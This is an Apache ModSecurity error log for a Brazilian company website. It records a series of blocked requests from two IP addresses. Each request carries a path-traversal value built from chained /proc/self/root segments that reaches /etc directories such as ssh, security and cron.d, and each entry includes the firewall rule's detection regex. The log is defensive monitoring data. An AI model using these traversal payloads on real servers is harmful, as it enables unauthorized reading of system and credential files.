[Mon Mar 16 16:45:54.550847 2026] [:error] [pid 15061:tid 140411574073088] [client 74.7.243.203:60428] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhd8qTCbgAP5jq5TehATQAAAtQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:55.859426 2026] [:error] [pid 15061:tid 140411590858496] [client 74.7.243.203:60442] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhd86TCbgAP5jq5TehATgAAAtI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:57.059718 2026] [:error] [pid 15061:tid 140411582465792] [client 74.7.243.203:60456] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhd9aTCbgAP5jq5TehATwAAAtM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:45:59.453361 2026] [:error] [pid 21805:tid 140411607643904] [client 74.7.243.203:60462] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhd97ABkC4fWIHEf8EG2gAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:00.849457 2026] [:error] [pid 21806:tid 140411565680384] [client 74.7.243.203:35332] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhd-NSswJuvopo3lOhyxgAAAJU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:03.118199 2026] [:error] [pid 15568:tid 140411725141760] [client 74.7.243.203:35346] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhd-6QpVkWug9HeOt9JAwAAA0I"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:05.435030 2026] [:error] [pid 10651:tid 140411708356352] [client 74.7.243.203:35360] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhd_bysWC90G-1nBrBXiwAAAYQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:06.721971 2026] [:error] [pid 15568:tid 140411616036608] [client 74.7.243.203:35376] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhd_qQpVkWug9HeOt9JBAAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:07.231456 2026] [:error] [pid 10772:tid 140411716749056] [client 74.7.241.46:42674] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc/rpm"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abhd__9ocpUE4ed4uDwGWwAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:46:08.002589 2026] [:error] [pid 21806:tid 140411708356352] [client 74.7.243.203:35378] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheANSswJuvopo3lOhyygAAAIQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:09.154734 2026] [:error] [pid 21806:tid 140411607643904] [client 74.7.243.203:35394] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheAdSswJuvopo3lOhyzAAAAJA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:10.479658 2026] [:error] [pid 29802:tid 140411607643904] [client 74.7.243.203:58186] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheAs_BxrYCr4hPDw_-AQAAAdA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:11.708506 2026] [:error] [pid 29507:tid 140411674785536] [client 74.7.243.203:58196] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/gss"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheA0r9dMAiw-8KANNakwAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:13.031498 2026] [:error] [pid 21806:tid 140411691570944] [client 74.7.243.203:58208] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheBdSswJuvopo3lOhy0QAAAIY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:13.167518 2026] [:error] [pid 10831:tid 140411674785536] [client 74.7.241.46:42740] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/tmpfiles.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheBY6lpbStxTqkSkt-KQAAAkg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:46:15.267243 2026] [:error] [pid 10772:tid 140411616036608] [client 74.7.243.203:58212] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheB_9ocpUE4ed4uDwGXwAAAg8"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:16.570636 2026] [:error] [pid 14895:tid 140411599251200] [client 74.7.243.203:58228] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheCFajLEzk2WiQ-10m1gAAApE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:16.967395 2026] [:error] [pid 21806:tid 140411632822016] [client 74.7.241.46:42754] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheCNSswJuvopo3lOhy2AAAAI0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 16:46:17.776408 2026] [:error] [pid 10831:tid 140411590858496] [client 74.7.243.203:58240] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheCY6lpbStxTqkSkt-KgAAAlI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:21.255757 2026] [:error] [pid 29802:tid 140411548894976] [client 74.7.243.203:58250] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/ntp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheDc_BxrYCr4hPDw_-BQAAAdc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Mon Mar 16 16:46:22.587075 2026] [:error] [pid 10772:tid 140411548894976] [client 74.7.243.203:46610] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abheDv9ocpUE4ed4uDwGYAAAAhc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
